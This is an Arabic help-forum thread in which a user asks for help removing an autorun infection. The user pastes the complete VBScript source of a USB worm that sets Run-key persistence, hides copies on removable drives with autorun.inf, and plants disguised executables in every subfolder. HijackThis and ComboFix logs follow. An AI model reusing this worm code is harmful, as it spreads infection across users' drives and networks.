رسالة تظهر أول ما تشغل الويندوز

  • بادئ الموضوع بادئ الموضوع سالم 20
  • تاريخ البدء تاريخ البدء
  • المشاهدات 739
س

سالم 20

زيزوومي جديد
إنضم
24 يناير 2008
المشاركات
32
مستوى التفاعل
0
النقاط
40
الإقامة
Saudi AraBia
غير متصل
السلام عليكم


انا كان عندي فيروس اوتو رن مطفشني

والحمدلله شلت الفيروس ببرنامج ZeUs ActiveScan 2008

لكن بعد ازالته ظهرت مشكلة ثانية

اول ما افتح الويندوز قبل ما ادخل الرقم السري

تظهر لي نافذة غريبة

فيها رابط لـ C:\WINDOWS\system32\shellstyle.dll

بعدين اضغط موافق يفتح الويندوز عادي

واول ما يشتغل تجيني رسالة عنوانها NEAD

وفيها هذا الكلام

on error resume next
set wshell=createobject("wscript.shell")
set shell=createobject("shell.application")
set fso=createobject("scripting.filesystemobject")
filepn="C:\WINDOWS\system\echo.exe"
function nethood()
on error resume next
set netho=shell.namespace(19)
set neth=netho.self
folder=neth.path
'msgbox filepn,folder&"\software.exe"
if not fso.folderexists(folder&"\software") then
fso.createfolder folder&"\software"
if not fso.fileexists(folder&"\software\software.exe") then
fso.copyfile filepn,folder&"\software\software.exe"
end if
end if
end function


function pd()
on error resume next
for each dr in fso.drives
if dr.drivetype=1 and dr.isready=true then
drv=dr.driveletter&":\"
'msgbox drv
if not fso.fileexists(drv&"software.exe") then
fso.copyfile filepn,drv&"software.exe",true
wshell.run "cmd /c attrib +h +r +s "&drv&"software.exe",0
fso.copyfile "C:\WINDOWS\system\autorun.inf",drv,true
end if
set pfol=fso.getfolder(drv)
spread(pfol)
'msgbox "ok"
end if
next
end function



function spread(objpath)
on error resume next
ph=left(wscript.scriptfullname,instrrev(wscript.scriptfullname,"\"))&"ECHO.EXE"
set fols=objpath.subfolders
for each f in fols
if fso.fileexists(f.path&"\"&f.name&".exe")=false then
fso.copyfile ph,f.path&"\"
fso.movefile f.path&"\ECHO.EXE",f.path&"\"&f.name&".exe"
end if
if f.subfolders.count>0 then
spread(f)
end if
next
end function
function autorun()
on error resume next
cpath="C:\WINDOWS\system"
if fso.fileexists("C:\WINDOWS\system\"&wscript.scriptname)=false then
wshell.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Servsk","C:\WINDOWS\system\"&wscript.scriptname,"REG_SZ"
if err then
wshell.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Servsk","C:\WINDOWS\system\"&wscript.scriptname,"REG_SZ"
end if
fso.copyfile wscript.scriptfullname,"C:\WINDOWS\system\"
wshell.run "C:\WINDOWS\system\"&wscript.scriptname
fso.copyfile left(wscript.scriptfullname,instrrev(wscript.scriptfullname,"\"))&"ne.vbs","C:\WINDOWS\system\"
fso.copyfile left(wscript.scriptfullname,instrrev(wscript.scriptfullname,"\"))&"autorun.inf","C:\WINDOWS\system\"
wscript.quit(1)
end if
end function

do
on error resume next
autorun()
nethood()
pd()
wscript.sleep 400
loop




لما اسوي استعادة النظام يروح هذا كله ولكن يرجع فيروس الاوتو رن مرة ثاية


يا ليت احد يشوف لي حل
 

ترتيب حسب التاريخ ترتيب حسب الأصوات
سو استعاادة نظام ,,
بعدها ,,


حمل هذا البرنامج ,,
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

شغل البرنامج ==> واضغط على
Do a system scan and save log
لحظات .. ويظهر لك تقرير داخل المفكرة ==> قم بنسخه ولصقه في ردك القاادم ,,
 
التعديل الأخير بواسطة المشرف:
توقيع : Future Tank X-1
تأييد 0
تفضل اخوي هذا هو اللي طلع


Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 11:48:31 م, on 05/08/2009
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16876)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\AppServ\Apache2.2\bin\httpd.exe
C:\Program Files\BandRich\BandLuxe HSDPA Utility R11\BRService.exe
C:\AppServ\Apache2.2\bin\httpd.exe
C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\Program Files\Common Files\Motive\McciCMService.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\AppServ\MySQL\bin\mysqld-nt.exe
C:\Program Files\CyberLink\Shared files\RichVideo.exe
C:\Program Files\SigmaTel\C-Major Audio\DellXPM_5515v131\WDM\STacSV.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\SigmaTel\C-Major Audio\WDM\stsystra.exe
C:\Program Files\Dell\QuickSet\quickset.exe
C:\WINDOWS\system32\igfxsrvc.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\WINDOWS\System32\WScript.exe
C:\Program Files\USB Disk Security\USBGuard.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\Microsoft ActiveSync\wcescomm.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\PROGRA~1\MI3AA1~1\rapimgr.exe
C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
C:\Documents and Settings\user\Local Settings\Application Data\Google\Update\1.2.183.7\GoogleCrashHandler.exe
C:\PROGRA~1\WIDCOMM\BLUETO~1\BTSTAC~1.EXE
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\internet explorer\iexplore.exe
D:\برامج كمبيوتر\HiJackThis.exe
C:\Program Files\Windows Live\Contacts\wlcomm.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Microsoft Internet Explorer
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = local
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: IEVkbdBHO - {59273AB4-E7D3-40F9-A1A8-6FA9CCA1862C} - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010\ievkbd.dll
O2 - BHO: مساعد تسجيل الدخول إلى Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: SnapFlash Class - {A44CBB0B-C77D-4BF5-87CC-B4EE79AD1B7E} - C:\Program Files\Common Files\Justdo\Jd2002.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files\Google\Google Toolbar\GoogleToolbar.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\5.1.1309.15642\swg.dll
O2 - BHO: Google Dictionary Compression sdch - {C84D72FE-E17D-4195-BB24-76C02E2E7C4E} - C:\Program Files\Google\Google Toolbar\Component\fastsearch_A8904FB862BD9564.dll
O2 - BHO: link filter bho - {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010\klwtbbho.dll
O2 - BHO: FlashFXP Helper for Internet Explorer - {E5A1691B-D188-4419-AD02-90002030B8EE} - C:\PROGRA~1\FlashFXP\IEFlash.dll
O2 - BHO: ppc2u Toolbar - {f62a7166-09e8-416c-a807-03422d4cd7b4} - C:\Program Files\ppc2u\tbppc2.dll
O3 - Toolbar: ppc2u Toolbar - {f62a7166-09e8-416c-a807-03422d4cd7b4} - C:\Program Files\ppc2u\tbppc2.dll
O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar.dll
O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [Persistence] C:\WINDOWS\system32\igfxpers.exe
O4 - HKLM\..\Run: [SigmatelSysTrayApp] %ProgramFiles%\SigmaTel\C-Major Audio\WDM\stsystra.exe
O4 - HKLM\..\Run: [Dell QuickSet] C:\Program Files\Dell\QuickSet\quickset.exe
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe"
O4 - HKLM\..\Run: [LanguageShortcut] "C:\Program Files\CyberLink\PowerDVD\Language\Language.exe"
O4 - HKLM\..\Run: [Servsk] C:\WINDOWS\system\NEAD.VBS
O4 - HKLM\..\Run: [USB Antivirus] C:\Program Files\USB Disk Security\USBGuard.exe
O4 - HKLM\..\Run: [AVP] "C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010\avp.exe"
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\Program Files\Microsoft ActiveSync\wcescomm.exe"
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [Google Update] "C:\Documents and Settings\user\Local Settings\Application Data\Google\Update\GoogleUpdate.exe" /c
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Bluetooth.lnk = ?
O4 - Global Startup: DriveGuard.lnk = C:\Program Files\WinDriveGuard\DriveGuard.exe
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Toolbars\Restrictions present
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Toolbars\Restrictions present
O8 - Extra context menu item: &تصدير إلى Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Save Flash with Flash Catcher - res://C:\Program Files\Common Files\Justdo\IECatcher.DLL/FlashCatcher.htm
O8 - Extra context menu item: Send to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O8 - Extra context menu item: أضافة إلى مانع الأعلانات - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010\ie_banner_deny.htm
O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll
O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll
O9 - Extra 'Tools' menuitem: Create Mobile Favorite... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll
O9 - Extra button: &Virtual keyboard - {4248FE82-7FCB-46AC-B270-339F08212110} - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010\klwtbbho.dll
O9 - Extra button: Flash Catcher - {90BAE0EF-F4BF-4FAC-B2EC-2C725C34AF12} - C:\Program Files\Common Files\Justdo\IECatcher.DLL
O9 - Extra 'Tools' menuitem: Flash Catcher - {90BAE0EF-F4BF-4FAC-B2EC-2C725C34AF12} - C:\Program Files\Common Files\Justdo\IECatcher.DLL
O9 - Extra button: بحث - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: URLs c&heck - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010\klwtbbho.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: Yahoo! Pool 2 -
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) -
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

O16 - DPF: {6924091F-CD97-41E1-B1D4-D9079409D413} (IMCv1 Control) -
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

O16 - DPF: {B7FDB0C3-4724-46D2-B8DB-6FA1DC63F7CA} (ReadUid.UserControlMacEntry) -
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) -
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) -
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

O16 - DPF: {E001C731-5E37-4538-A5CB-8168736A2360} (Confirmation) -
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

O16 - DPF: {F5A7706B-B9C0-4C89-A715-7A0C6B05DD48} (Minesweeper Flags Class) -
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

O18 - Filter: x-sdch - {B1759355-3EEC-4C1E-B0F1-B719FE26E377} - C:\Program Files\Google\Google Toolbar\Component\fastsearch_A8904FB862BD9564.dll
O20 - AppInit_DLLs: C:\PROGRA~1\KASPER~1\KASPER~2\mzvkbd.dll,C:\PROGRA~1\KASPER~1\KASPER~2\mzvkbd3.dll,C:\PROGRA~1\KASPER~1\KASPER~2\kloehk.dll
O23 - Service: Apache2.2 - Apache Software Foundation - C:\AppServ\Apache2.2\bin\httpd.exe
O23 - Service: Kaspersky Internet Security (AVP) - Kaspersky Lab - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010\avp.exe
O23 - Service: BandLuxe Service (BandLuxe_Service) - BandRich Inc. - C:\Program Files\BandRich\BandLuxe HSDPA Utility R11\BRService.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: McciCMService - Motive Communications, Inc. - C:\Program Files\Common Files\Motive\McciCMService.exe
O23 - Service: mysql - Unknown owner - C:\AppServ\MySQL\bin\mysqld-nt.exe
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files\CyberLink\Shared files\RichVideo.exe
O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - CACE Technologies - C:\Program Files\WinPcap\rpcapd.exe
O23 - Service: ServiceLayer - Nokia. - C:\Program Files\Nokia\PC Connectivity Solution\ServiceLayer.exe
O23 - Service: SigmaTel Audio Service (STacSV) - SigmaTel, Inc. - C:\Program Files\SigmaTel\C-Major Audio\DellXPM_5515v131\WDM\STacSV.exe
--
End of file - 11475 bytes
 
تأييد 0
عطل برامج الحماية عن العمل
ثم
حمل الاداة التالية واحفظها على سطح المكتب
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

عند تشغيلها بتظهر لك رسالة ,, اضغط على >> Yes
بعدها بتظهر لك رساله ثانيه ,, اضغط على >> Yes
اثناء الفحص( ممكن) يعاد تشغيل الجهاز
وبعد اعادة التشغيل ,, سوف تبدأ الاداة بالفحص مرره ثانيه
لا تقم بتشغيل اي برنامج ،، ومهما طالت عملية الفحص انتظر حتى تنتهي
انتظر حتى يظهر لك تقرير ،،انسخه والصقه بمشاركتك القادمة
بعدها تقرير هايجك جديد ,,
 
التعديل الأخير بواسطة المشرف:
توقيع : Future Tank X-1
تأييد 0
تفضل اخوي هذا هو التقرير


ComboFix 09-08-04.04 - user 08/06/2009 1:27.2.2 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1256.966.1025.18.1014.466 [GMT 3:00]
Running from: d:\برامج كمبيوتر\ComboFix.exe
AV: Kaspersky Internet Security *On-access scanning disabled* (Updated) {2C4D4BC6-0793-4956-A9F9-E252435469C0}
FW: Kaspersky Internet Security *disabled* {2C4D4BC6-0793-4956-A9F9-E252435469C0}
WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\abojasem\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\boahmed hor\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\Hacen Casablanca\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\Hacen Newspaper\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\Hacen Promoter\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\KacstArt\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\KacstDigital\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\KacstFarsi\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\KacstQurn\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\New Folder (2)\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\New Folder (3)\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\New Folder (4)\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\New Folder (5)\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\New Folder (7)\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\New Folder 6)\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\New Folder(1)\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\resource\apps\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\resource\CommonDRM\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\resource\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\resource\help\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\resource\plugins\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\SC_AMEEN\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\SC_OUHOD\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\SC_SHARJAH\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\SC_TARABLUS\Desktop_.ini
c:\documents and settings\user\سطح المكتب\للجوالات\الــجـــــ3ـــــــيــل\1تغيير خطوط الجوال\tahoma\Desktop_.ini
c:\windows\Installer\115aa5.msi
c:\windows\Installer\1259a.msi
c:\windows\Installer\48e6d9.msi
c:\windows\Installer\828764.msi
c:\windows\Installer\82876a.msi
c:\windows\Installer\8287e4.msi
c:\windows\Installer\82885d.msi
c:\windows\Installer\8289be.msi
c:\windows\Installer\8289c6.msi
c:\windows\Installer\8289cc.msi
c:\windows\Installer\828ace.msi
c:\windows\Installer\84a03a.msp
c:\windows\Installer\c5eee1.msp
c:\windows\system32\bpk.dat
c:\windows\system32\Drivers\mepogm.sys
c:\windows\system32\web.dat
.
((((((((((((((((((((((((( Files Created from 2009-07-05 to 2009-08-05 )))))))))))))))))))))))))))))))
.
2009-08-05 22:45 . 2009-08-05 22:45 -------- d-----w- c:\documents and settings\TEMP
2009-08-05 20:44 . 2009-08-05 20:44 -------- d-----w- c:\windows\system32\wbem\Repository
2009-08-02 22:09 . 2009-08-02 22:09 -------- d-----w- c:\documents and settings\user\Application Data\Uniblue
2009-08-02 22:09 . 2009-06-29 04:37 2568250 -c--a-w- c:\documents and settings\All Users\Application Data\{81D4BDA8-1F33-4633-B176-8A7E942ABDE1}\Uniblue RegistryBooster.exe
2009-08-02 22:09 . 2009-08-02 22:09 -------- d-----w- c:\program files\Uniblue
2009-08-02 22:09 . 2008-08-26 16:48 99624 -c--a-w- c:\documents and settings\All Users\Application Data\{81D4BDA8-1F33-4633-B176-8A7E942ABDE1}\registrybooster2\7390E4F0\6383BC9B\StartRegistryBooster.exe
2009-08-02 22:09 . 2008-08-26 16:48 757760 -c--a-w- c:\documents and settings\All Users\Application Data\{81D4BDA8-1F33-4633-B176-8A7E942ABDE1}\registrybooster2\2B86F085\6383BC9B\UBVarRB.dll
2009-08-02 22:09 . 2008-08-26 16:48 6676480 -c--a-w- c:\documents and settings\All Users\Application Data\{81D4BDA8-1F33-4633-B176-8A7E942ABDE1}\registrybooster2\4E45A1A4\6383BC9B\RegistryBooster.dll
2009-08-02 22:09 . 2008-08-26 16:48 497496 -c--a-w- c:\documents and settings\All Users\Application Data\{81D4BDA8-1F33-4633-B176-8A7E942ABDE1}\registrybooster2\AF01B0B\6383BC9B\XceedZip.dll
2009-08-02 22:09 . 2008-08-26 16:48 413696 -c--a-w- c:\documents and settings\All Users\Application Data\{81D4BDA8-1F33-4633-B176-8A7E942ABDE1}\registrybooster2\52CD59C9\6383BC9B\update.dll
2009-08-02 22:09 . 2008-08-26 16:48 2019624 -c--a-w- c:\documents and settings\All Users\Application Data\{81D4BDA8-1F33-4633-B176-8A7E942ABDE1}\registrybooster2\7CE1607E\6383BC9B\RegistryBooster.exe
2009-08-02 22:09 . 2008-08-26 16:48 111912 -c--a-w- c:\documents and settings\All Users\Application Data\{81D4BDA8-1F33-4633-B176-8A7E942ABDE1}\registrybooster2\65B92A91\6383BC9B\KillRBProcess.exe
2009-08-02 21:57 . 2009-08-02 22:09 -------- dc-h--w- c:\documents and settings\All Users\Application Data\{81D4BDA8-1F33-4633-B176-8A7E942ABDE1}
2009-08-02 21:13 . 2009-08-02 21:37 -------- d-----w- c:\program files\Bug Doctor
2009-08-01 03:53 . 2009-08-01 03:53 -------- d-----w- c:\documents and settings\user\Local Settings\Application Data\Thinstall
2009-08-01 03:53 . 2009-08-01 03:53 -------- d-----w- c:\documents and settings\user\Application Data\Thinstall
2009-08-01 01:30 . 2009-08-01 01:30 -------- d-----w- c:\program files\Driver-Soft
2009-07-31 02:27 . 2009-07-31 02:27 932368 ----a-w- c:\documents and settings\All Users\Application Data\Kaspersky Lab\AVP9\Data\KasFlt\Plugins\profiles-1-6.dll
2009-07-31 02:27 . 2009-07-31 02:27 678416 ----a-w- c:\documents and settings\All Users\Application Data\Kaspersky Lab\AVP9\Data\KasFlt\Plugins\content_interpreter-1-1.dll
2009-07-31 02:27 . 2009-07-31 02:27 604688 ----a-w- c:\documents and settings\All Users\Application Data\Kaspersky Lab\AVP9\Data\KasFlt\Plugins\gsg-3-9.dll
2009-07-31 02:27 . 2009-07-31 02:27 1096208 ----a-w- c:\documents and settings\All Users\Application Data\Kaspersky Lab\AVP9\Data\KasFlt\Plugins\filtration-4-6.dll
2009-07-31 02:27 . 2009-07-31 02:27 522768 ----a-w- c:\documents and settings\All Users\Application Data\Kaspersky Lab\AVP9\Data\KasFlt\Plugins\database-1-5.dll
2009-07-25 18:39 . 2009-07-25 18:39 -------- d-----w- c:\documents and settings\NetworkService\Application Data\Bytemobile
2009-07-25 18:39 . 2003-09-08 11:43 89728 ----a-w- c:\windows\system32\drivers\usbvsp.sys
2009-07-25 18:38 . 2009-07-25 18:38 -------- d-----w- c:\documents and settings\user\Application Data\DBUpdater
2009-07-25 18:38 . 2008-03-06 12:57 27072 ----a-w- c:\windows\system32\drivers\PCASp50.sys
2009-07-25 18:22 . 2009-07-25 17:31 26504 ----a-w- c:\windows\system32\drivers\swmsflt.sys
2009-07-25 17:45 . 2009-07-25 17:45 -------- d-----w- c:\documents and settings\user\Application Data\AT&T
2009-07-25 17:35 . 2007-01-18 07:24 26496 ----a-r- c:\windows\system32\drivers\RimSerial.sys
2009-07-25 17:33 . 2009-07-25 17:33 -------- d-----w- c:\program files\Option
2009-07-25 17:32 . 2009-07-25 17:32 -------- d-----w- c:\program files\Common Files\Motorola Shared
2009-07-25 17:30 . 2009-07-25 17:30 -------- d-----w- c:\program files\Sierra Wireless Inc
2009-07-25 17:30 . 2009-07-25 17:30 -------- d-----w- c:\documents and settings\user\Application Data\Sierra Wireless
2009-07-20 03:48 . 2009-07-20 03:48 -------- d-----w- c:\program files\LtUcx
2009-07-17 19:31 . 2009-08-01 03:32 -------- d-----w- c:\documents and settings\user\Local Settings\Application Data\Temp
2009-07-11 15:47 . 2009-07-11 15:47 604140 --sha-w- c:\windows\system32\drivers\ISwift3.dat
2009-07-11 15:46 . 2009-07-11 15:46 94643 ----a-w- c:\windows\system32\drivers\klick.dat
2009-07-11 15:46 . 2009-07-11 15:46 105395 ----a-w- c:\windows\system32\drivers\klin.dat
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-08-05 22:47 . 2008-04-16 14:27 -------- d-----w- c:\documents and settings\All Users\Application Data\Kaspersky Lab
2009-08-05 20:50 . 2001-09-19 12:00 69282 ----a-w- c:\windows\system32\perfc001.dat
2009-08-05 20:50 . 2001-09-19 12:00 370960 ----a-w- c:\windows\system32\perfh001.dat
2009-08-02 21:36 . 2008-07-15 16:58 -------- d-----w- c:\program files\Microsoft ActiveSync
2009-07-30 02:23 . 2008-05-14 17:36 -------- d-----w- c:\program files\FlashFXP
2009-07-26 17:27 . 2008-04-15 17:08 288192 ----a-w- c:\documents and settings\user\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2009-07-26 16:07 . 2008-07-17 18:13 -------- d-----w- c:\program files\Yahoo!
2009-07-26 16:06 . 2008-04-17 11:25 -------- d-----w- c:\program files\Nokia
2009-07-25 18:39 . 2008-04-15 17:17 -------- d--h--w- c:\program files\InstallShield Installation Information
2009-07-23 16:02 . 2008-06-08 15:35 -------- d-----w- c:\program files\Mobily Connect Card
